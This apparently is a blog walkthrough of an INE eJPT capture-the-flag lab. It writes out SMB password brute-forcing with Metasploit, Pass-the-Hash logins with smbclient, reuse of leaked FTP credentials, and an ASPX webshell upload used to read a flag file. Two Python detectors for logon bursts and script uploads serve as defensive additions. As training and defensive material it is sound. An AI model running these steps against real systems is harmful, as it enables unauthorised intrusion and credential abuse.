A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.
Hello everyone!
In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefully, each one actually unlocks the answer for the next. The lab is designed as a chain, and once you spot that pattern it flows naturally from start to finish.
So, let’s dive in.
Q. Looks like SMB user tom has not changed his password in a very long time.
As usual, I started with an Nmap scan and opened Metasploit in parallel:
nmap -T4 -sV -O -sC target.ine.local
service postgresql start && msfconsole -q -x "workspace -a win"
The scan revealed several open ports — FTP on 21, HTTP on 80, SMB on 445, and RDP on 3389. The question was pointing directly at SMB and a user called tom with a weak password, so I loaded the smb_login auxiliary module and brute-forced it against the provided wordlist:
use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser tom
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
run
Got it. With valid credentials, I listed the available SMB shares using smbmap:
smbmap -H target.ine.local -u tom -p <password>
Tom had read access to HRDocuments. I connected and listed the contents:
smbclient //target.ine.local/HRDocuments -U tom --password <password>
smb: \> ls
Two files — flag1.txt and leaked-hashes.txt. Flag 1 captured, and the hashes file was clearly the hint for the next question.
Q. Using the NTLM hash list discovered in the previous challenge, can you compromise the SMB user nancy?
The leaked hashes file contained multiple NTLM hashes. The question pointed at user nancy, so instead of cracking the hashes I went straight to a Pass-the-Hash attack — using the hashes directly against SMB:
use auxiliary/scanner/smb/smb_login
set rhosts target.ine.local
set smbuser nancy
set pass_file leaked-hashes.txt
run
One hash matched. Each entry in the file is in <LM_HASH>:<NT_HASH> format, and only the NT portion is needed for NTLM authentication, so I passed just that half to smbclient with --pw-nt-hash:
smbclient //target.ine.local/ITResources -U nancy --pw-nt-hash <NT_hash>
smb: \> ls
Two files inside — flag2.txt and hint.txt. Flag 2 captured. I grabbed the hint file:
smb: \> get hint.txt
Q. I wonder what the hint found in the previous challenge could be useful for!
I opened the hint file:
cat hint.txt
It contained a set of credentials for a user called david. The Nmap scan had shown FTP open on port 21, so I tried them there:
ftp ftp://david:<password>@target.ine.local
Logged in. Listing the FTP directory showed flag3.txt sitting right there alongside the default IIS files. Flag 3 captured.
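Before moving on to the last flag, it is worth looking at how the SMB activity from the first two questions appears on the target itself. This is an added example, not part of the original walkthrough: a small Python detector run over constructed, simplified Security-event records (epoch time, event ID 4625 for a failed logon or 4624 for a success, target account, source address, logon type, authentication package; this compact layout is an assumption for the example, not a real log export). It flags a burst of failed logons for one account from one source, and then a success from the same source shortly afterwards. Both the wordlist run against tom and the hash list tried against nancy produce this shape, since each password or hash is a separate NTLM attempt.

```python
"""Spot an SMB credential-guessing burst followed by a successful logon.

Added example with constructed, simplified Security-event records.
Record layout (an assumption for this example):
    time,event_id,account,source,logon_type,package
"""
from collections import defaultdict, deque

# Constructed sample: a wordlist tried against "tom", an unrelated Kerberos
# logon by "alice", then a hash list tried against "nancy", each followed by
# a success from the same source. Not real logs.
SAMPLE_EVENTS = """\
1700000000,4625,tom,10.10.1.5,3,NTLM
1700000001,4625,tom,10.10.1.5,3,NTLM
1700000001,4625,tom,10.10.1.5,3,NTLM
1700000002,4625,tom,10.10.1.5,3,NTLM
1700000002,4625,tom,10.10.1.5,3,NTLM
1700000003,4624,tom,10.10.1.5,3,NTLM
1700000600,4624,alice,10.10.1.7,3,Kerberos
1700000900,4625,nancy,10.10.1.5,3,NTLM
1700000901,4625,nancy,10.10.1.5,3,NTLM
1700000902,4625,nancy,10.10.1.5,3,NTLM
1700000902,4625,nancy,10.10.1.5,3,NTLM
1700000903,4625,nancy,10.10.1.5,3,NTLM
1700000904,4624,nancy,10.10.1.5,3,NTLM
"""

FAIL_THRESHOLD = 5   # failures for one (account, source) pair ...
WINDOW_SECONDS = 60  # ... inside this many seconds raise an alert


def parse_events(text):
    """Turn the compact comma-separated records into dicts."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        t, eid, account, source, ltype, package = line.split(",")
        events.append({"time": int(t), "event_id": int(eid), "account": account,
                       "source": source, "logon_type": int(ltype),
                       "package": package})
    return events


def detect_guessing(events, threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Return alerts for failure bursts and for successes that follow them."""
    failures = defaultdict(deque)  # (account, source) -> recent failure times
    burst_seen = {}                # (account, source) -> time of last burst alert
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["account"], ev["source"])
        recent = failures[key]
        # Drop failures that have aged out of the sliding window.
        while recent and ev["time"] - recent[0] > window:
            recent.popleft()
        if ev["event_id"] == 4625:
            recent.append(ev["time"])
            already = burst_seen.get(key)
            if len(recent) >= threshold and (already is None or ev["time"] - already > window):
                burst_seen[key] = ev["time"]
                alerts.append({"kind": "guessing_burst", "account": ev["account"],
                               "source": ev["source"], "time": ev["time"],
                               "failures": len(recent)})
        elif ev["event_id"] == 4624:
            flagged = burst_seen.get(key)
            # A success right after a flagged burst is the interesting one.
            if flagged is not None and ev["time"] - flagged <= window:
                alerts.append({"kind": "guessing_success", "account": ev["account"],
                               "source": ev["source"], "time": ev["time"],
                               "logon_type": ev["logon_type"],
                               "package": ev["package"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The success record from the hash-based logon is an ordinary NTLM network logon (logon type 3); on its own it does not show whether a hash or a password was supplied, which is why the detector keys on the failure burst that precedes it rather than on the success event alone. On a real host these are Security-log events 4625 and 4624 rather than the constructed rows above, and the threshold and window are tuning knobs.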
Q. Can you compromise the target machine and retrieve the C:\flag4.txt file?
Still in the FTP session — and the FTP root appeared to be the IIS web root (same iisstart.htm and iis-85.png from the default IIS page). That meant anything uploaded via FTP would be accessible directly from the web server.
I uploaded an ASPX webshell:
ftp> put /usr/share/webshells/aspx/cmdasp.aspx cmd.aspx
Then opened it in the browser:
http://target.ine.local/cmd.aspx
The webshell gave me a command input field. I ran:
type C:\flag4.txt
Flag 4 returned directly in the browser.
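The whole final step hinges on the FTP root and the IIS web root being the same directory with write access, so the upload of a server-executable file is the event a defender wants to see in the FTP log. As an added example that is not part of the original walkthrough, the Python below parses W3C extended-format FTP log lines (the format IIS FTP writes; the sample lines and their #Fields header are constructed for this example, and field names are taken from that header rather than hard-coded) and reports every STOR upload or RNTO rename whose target has a server-side script extension, recording whether the server accepted it.

```python
"""Flag FTP writes of server-executable files from W3C-format FTP logs.

Added example; the log excerpt is constructed to resemble an IIS FTP log
and is not a real capture. Field names come from the #Fields header.
"""
import os

# Extensions IIS will execute if such a file lands in the web root.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}
# STOR uploads a file; RNTO completes a rename (a .txt can become a .aspx).
WRITE_METHODS = {"STOR", "RNTO"}

# Constructed sample log: a legitimate download, an upload of cmd.aspx,
# a harmless text upload, a rename to .ashx, and a rejected upload (550).
SAMPLE_LOG = """\
#Software: constructed sample
#Version: 1.0
#Fields: date time c-ip c-port cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-15 10:02:11 10.10.1.5 51022 david 10.10.1.20 21 PASS *** 230 0 0 7 /
2024-01-15 10:02:15 10.10.1.5 51022 david 10.10.1.20 21 RETR flag3.txt 226 0 0 7 /flag3.txt
2024-01-15 10:03:40 10.10.1.5 51022 david 10.10.1.20 21 STOR cmd.aspx 226 0 0 7 /cmd.aspx
2024-01-15 10:05:02 10.10.1.5 51022 david 10.10.1.20 21 STOR notes.txt 226 0 0 7 /notes.txt
2024-01-15 10:05:30 10.10.1.5 51022 david 10.10.1.20 21 RNTO shell.ASHX 250 0 0 7 /shell.ASHX
2024-01-15 10:06:00 10.10.1.9 49111 bob 10.10.1.20 21 STOR report.aspx 550 0 0 8 /report.aspx
"""


def parse_w3c_log(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(None, 1)[1].split()
            continue
        if not line.strip() or line.startswith("#"):
            continue
        values = line.split()
        # Skip rows that do not match the declared layout instead of guessing.
        if fields is None or len(values) != len(fields):
            continue
        records.append(dict(zip(fields, values)))
    return records


def find_script_writes(records):
    """Return one finding per upload/rename that targets a script extension."""
    findings = []
    for rec in records:
        method = rec.get("cs-method", "").upper()
        if method not in WRITE_METHODS:
            continue
        path = rec.get("cs-uri-stem", "")
        ext = os.path.splitext(path)[1].lower()  # case-insensitive: .ASHX counts
        if ext not in SCRIPT_EXTENSIONS:
            continue
        status = rec.get("sc-status", "")
        findings.append({
            "when": f'{rec.get("date", "")} {rec.get("time", "")}',
            "user": rec.get("cs-username", ""),
            "source": rec.get("c-ip", ""),
            "method": method,
            "path": path,
            "succeeded": status.startswith("2"),  # 226 / 250 = server accepted it
        })
    return findings


if __name__ == "__main__":
    for finding in find_script_writes(parse_w3c_log(SAMPLE_LOG)):
        print(finding)
```

Pairing this with a file-integrity watch on the web root catches the same upload from the other side, and the rejected 550 row shows why the finding keeps the outcome: a failed attempt is still worth knowing about, but it is the accepted STOR of cmd.aspx that matches what happened in this lab.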
Final Thoughts
This CTF was well designed — each flag handed you exactly what you needed for the next one. Tom’s weak password gave the NTLM hashes. The hashes gave nancy’s access. Nancy’s share gave david’s credentials. David’s FTP session gave webshell upload, and the webshell gave the final flag.
The Pass-the-Hash step was the most interesting technically. You never need to crack an NTLM hash to use it: NTLM authentication accepts the NT hash directly as the credential, which means a leaked hash file is often as good as a plaintext password list.
Thanks for reading!